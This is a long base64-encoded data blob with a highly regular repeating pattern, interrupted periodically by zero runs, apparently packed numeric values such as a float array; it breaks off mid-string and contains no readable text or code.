4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4